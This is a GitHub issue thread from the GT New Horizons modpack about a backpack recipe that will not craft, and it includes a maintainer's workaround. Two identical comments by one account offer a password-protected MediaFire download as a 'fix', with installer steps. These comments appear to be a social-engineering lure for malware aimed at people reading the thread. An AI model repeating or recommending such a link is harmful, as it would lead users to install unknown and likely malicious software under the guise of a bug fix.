### ISSUE TITLE
cannot craft the bat backpack cause a bug

### ISSUE THREAD

**Issue by Lukakun4891** [GTNewHorizons/GT-New-Horizons-Modpack#17159]
### Your Pack Version

2.7.0

### Your Server

private server

### Java Version

Java 21

### Type of Server

Don't know

### Your Expectation

i expected i can craft the backpack i have all the right item but the recipe doesnt work... 

### The Reality

![image](https://github.com/user-attachments/assets/1f4db3f4-c7cd-4e9e-a1f7-46456393a048)

### Your Proposal

i just wait if that bug recipe it will be fixed 

### Final Checklist

- [X] I have searched this issue tracker and there is nothing similar already. Posting on a closed issue saying the bug still exists will prompt us to investigate and reopen it once we confirm your report.
- [ ] I can reproduce this problem consistently by follow the exact steps I described above, or this does not need reproducing, e.g. recipe loophole.
- [X] I have asked other people and they confirm they also have this problem by follow the exact steps I described above, or this does not need reproducing, e.g. recipe loophole.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by chochem** [comment]
some testing says the problem is the backpack, not the goggles like your pic suggests. try placing it down and breaking it, that should be enough as a workaround right now.
